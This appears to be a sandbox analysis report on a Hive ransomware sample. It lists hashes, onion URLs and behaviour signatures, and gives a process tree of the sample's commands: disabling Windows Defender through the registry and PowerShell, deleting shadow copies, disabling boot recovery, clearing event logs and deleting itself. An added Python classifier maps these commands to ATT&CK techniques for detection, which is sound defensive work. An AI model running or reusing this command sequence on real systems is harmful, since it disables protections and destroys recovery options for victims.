Analysis
max time kernel: 153s
max time network: 130s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 16:30
Static task: static1
Behavioral task: behavioral1
  Sample: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
  Resource: win10-en-20211208
General
Target: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Size: 4.2MB
MD5: 8c005827cf6f2d6b66d3fe8048387dde
SHA1: bfdea3bac03c5e5b1748447232db46cfa964a300
SHA256: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372
SHA512: 2dde409e3048fe4f9a9bca1cc3a07546dc2958e7aefc29e3fe45094bbb5510ba28797a301781eb7559fd361463b004085b7cb758c9e420599504b7e54c620fa7
Malware Config
Extracted
C:\Program Files\7-Zip\wbzc_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (pid 944)
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes: reg.exe, Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes: bcdedit.exe (pid 1724), bcdedit.exe (pid 1488)
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (pid 1052)
Opens file in notepad (likely ransom note) 1 IoCs
Processes: notepad.exe (pid 2472)
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes: powershell.exe (pid 108), powershell.exe (pid 2096), 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe (pid 1748)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:580
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1568
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:824
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1300
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1032
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1144
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1692
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1008
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1656
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1304
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1968
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1952
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:636
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:896
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1664
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1688
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:1284
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f  (depth 2)
  PID:1636
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f  (depth 2)
  PID:584
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f  (depth 2)
  PID:548
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f  (depth 2)
  PID:1384
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f  (depth 2)
  PID:1824
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f  (depth 2)
  PID:1300
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f  (depth 2)
  PID:1028
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f  (depth 2)
  PID:1120
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f  (depth 2)
  PID:860
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f  (depth 2)
  PID:848
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f  (depth 2)
  PID:1452
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f  (depth 2)
  PID:1484
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f  (depth 2)
  PID:2040
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f  (depth 2)
  PID:684
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f  (depth 2)
  PID:1064
-
C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable  (depth 2)
  PID:1708
-
C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable  (depth 2)
  PID:1280
-
C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable  (depth 2)
  PID:1556
-
C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable  (depth 2)
  PID:368
-
C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable  (depth 2)
  PID:1588
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f  (depth 2)
  PID:284
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f  (depth 2)
  PID:1056
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f  (depth 2)
  PID:1936
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f  (depth 2)
  PID:1356
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f  (depth 2)
  PID:1956
-
C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f  (depth 2)
  PID:1644
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:1576
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:1168
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:1552
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:520
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  - Modifies security service
  PID:1820
-
C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (depth 2)
  PID:828
-
C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet  (depth 2)
  - Interacts with shadow copies
  PID:1052
-
C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system  (depth 2)
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
-
C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security  (depth 2)
  - Suspicious use of AdjustPrivilegeToken
  PID:904
-
C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application  (depth 2)
  - Suspicious use of AdjustPrivilegeToken
  PID:572
-
C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive  (depth 2)
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
-
C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete  (depth 2)
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
-
C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures  (depth 2)
  - Modifies boot configuration data using bcdedit
  PID:1724
-
C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no  (depth 2)
  - Modifies boot configuration data using bcdedit
  PID:1488
-
C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (depth 2)
  PID:1072
-
C:\Program Files\Windows Defender\MpCmdRun.exe
  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (depth 3)
  - Deletes Windows Defender Definitions
  PID:944
-
C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true  (depth 2)
  PID:1144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIOAVProtection $true  (depth 3)
  - Suspicious behavior: EnumeratesProcesses
  PID:108
-
C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true  (depth 2)
  PID:2076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableRealtimeMonitoring $true  (depth 3)
  - Suspicious behavior: EnumeratesProcesses
  PID:2096
-
C:\Windows\system32\notepad.exe
  notepad.exe C:\wbzc_HOW_TO_DECRYPT.txt  (depth 2)
  - Opens file in notepad (likely ransom note)
  PID:2472
-
C:\Windows\system32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"  (depth 2)
  PID:2480
-
C:\Windows\system32\PING.EXE
  ping.exe -n 5 127.0.0.1  (depth 3)
  - Runs ping.exe
  PID:2504
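The process tree above is close to a complete catalogue of the commands Hive runs before encryption: service stops and disables, Defender policy and service tampering, shadow-copy and boot-recovery removal, event-log clearing, and the ping-then-del self-deletion at the end. As an added example that is not part of this sandbox report or of any vendor tooling, the Python classifier below maps such command lines to those behaviours so the same pattern can be matched over process-creation telemetry (Sysmon Event ID 1 or Security 4688 command lines). The sample input is constructed from the command lines in the tree, with the sample's file name shortened to sample.exe and two benign control lines added; the ATT&CK IDs and category names are a labelling scheme chosen here for illustration, and the reg.exe rule flags any write to the Defender keys rather than checking individual value names.

```python
"""Classify process command lines into the defence-evasion and
recovery-inhibition behaviours seen in the Hive process tree.

Added example; not part of the sandbox report or of any vendor tooling.
ATT&CK IDs and names are used here as a convenient labelling scheme.
"""
import re

# Constructed input: command lines taken from the process tree above, with the
# sample file name shortened to sample.exe, plus two benign control lines.
SAMPLE_CMDLINES = [
    'net.exe stop "VSS" /y',
    'C:\\Windows\\system32\\net1 stop "wbengine" /y',
    'sc.exe config "VSS" start= disabled',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    'cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    'cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    'vssadmin.exe delete shadows /all /quiet',
    'wmic.exe shadowcopy delete',
    'bcdedit.exe /set {default} recoveryenabled no',
    'wevtutil.exe cl security',
    'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.exe"',
    'ping.exe -n 5 127.0.0.1',   # benign control: no "&& del" self-delete
    'sc.exe query "VSS"',        # benign control: reads, does not disable
]

# (technique id, name, programs the rule applies to, regex over the lowercased
# arguments). The "target" group is the service, key, task or file involved.
RULES = [
    ("T1489", "Service Stop", {"net", "net1"},
     re.compile(r'^stop\s+"?(?P<target>[^"\s]+)')),
    ("T1489", "Service Stop", {"sc"},
     re.compile(r'^config\s+"?(?P<target>[^"\s]+)"?\s+start=\s*disabled')),
    # Any write to the Defender policy, Defender service/driver or Defender ETW
    # autologger keys is flagged; per-value tuning is deliberately left out.
    ("T1562.001", "Disable or Modify Tools", {"reg"},
     re.compile(r'^(?:add|delete)\s+"?(?P<target>hk\w+\\(?:'
                r'software\\policies\\microsoft\\windows defender[^"]*'
                r'|system\\currentcontrolset\\services\\(?:wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|securityhealthservice)'
                r'|system\\currentcontrolset\\control\\wmi\\autologger\\defender\w*))')),
    ("T1562.001", "Disable or Modify Tools", {"schtasks"},
     re.compile(r'^/change\s+/tn\s+"?(?P<target>[^"]*(?:windows defender|exploitguard)[^"]*)"?\s+/disable')),
    ("T1562.001", "Disable or Modify Tools", {"mpcmdrun"},
     re.compile(r'(?P<target>-removedefinitions(?:\s+-all)?)')),
    ("T1562.001", "Disable or Modify Tools", {"powershell", "pwsh"},
     re.compile(r'set-mppreference\s+(?P<target>-disable\w+)\s+\$true')),
    ("T1490", "Inhibit System Recovery", {"vssadmin"},
     re.compile(r'^(?P<target>delete\s+shadows)')),
    ("T1490", "Inhibit System Recovery", {"wmic"},
     re.compile(r'^(?P<target>shadowcopy\s+delete)')),
    ("T1490", "Inhibit System Recovery", {"bcdedit"},
     re.compile(r'^/set\s+\{default\}\s+(?P<target>recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
    ("T1070.001", "Clear Windows Event Logs", {"wevtutil"},
     re.compile(r'^cl\s+(?P<target>\S+)')),
    ("T1070.004", "File Deletion (ping-delay self-delete)", {"ping"},
     re.compile(r'&&\s*del\s+"?(?P<target>[^"]+)')),
]


def split_cmdline(cmdline):
    """Return (program basename without .exe, arguments), both lowercased."""
    s = cmdline.strip()
    if s.startswith('"'):                      # quoted image path
        end = s.find('"', 1)
        prog, rest = (s[1:end], s[end + 1:]) if end > 0 else (s[1:], "")
    else:
        prog, _, rest = s.partition(" ")
    prog = prog.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if prog.endswith(".exe"):
        prog = prog[:-4]
    return prog, rest.strip().lower()


def classify(cmdline):
    """Return (technique_id, name, target) for a matching command line, else None."""
    prog, args = split_cmdline(cmdline)
    # Unwrap "cmd.exe /c <inner command>" so the inner program is what is matched.
    while prog == "cmd":
        m = re.match(r'(?:/[dck]\s+)+(.+)$', args)
        if not m:
            return None
        prog, args = split_cmdline(m.group(1))
    for tid, name, programs, pattern in RULES:
        if prog in programs:
            m = pattern.search(args)
            if m:
                return tid, name, m.group("target")
    return None


def summarize(cmdlines):
    """Group matched targets by technique id and count the lines no rule matched."""
    summary, unmatched = {}, 0
    for line in cmdlines:
        hit = classify(line)
        if hit is None:
            unmatched += 1
            continue
        tid, _, target = hit
        summary.setdefault(tid, []).append(target)
    return summary, unmatched


if __name__ == "__main__":
    summary, unmatched = summarize(SAMPLE_CMDLINES)
    for tid, targets in summary.items():
        print(f"{tid}: {targets}")
    print(f"unmatched: {unmatched}")
```

Because the wrapper unwrapping follows cmd.exe /c into the inner program, both the parent cmd.exe line and the child MpCmdRun.exe or powershell.exe line in the tree classify the same way, which is what you want when only one of the two events reaches the SIEM. Individually none of these commands is rare on an administered host; the signal is the volume and the ordering, so a rule that counts distinct technique ids per parent process within a short window is a better alert than any single line.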
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 02c407da2f40abf4360451a9267406bb
SHA1 df883e6533a6e78ef1ce8017299d5403375917e7
SHA256 21d8e477dd0abe67dfd55baa0759492f5164b113c8c1151d69ddc791ed2f4475
SHA512 eeebd3cbb4435c458ff046d23961f712c84ebb1fd7f624ce938f5da3001dbe411dbe1a3981770f0b487dc53cca24418c1a7c451d1df96429edbf1954fef8e79e
-
MD5 94140f86ecb9d062265eac7b7795646a
SHA1 3db5ede5d02c592e82133318f404592b4b547288
SHA256 542850d1bc9b7db0628229dd0fcf63deea399a04ab395f02261a76fd6a29ab60
SHA512 5a85cb40cc4235080064e09a0f32be259d00cb5308868c76a09dbb596386a17a864b65fca60366eba91a886e422ca45a7441b45a27ca40f564473b6d656da543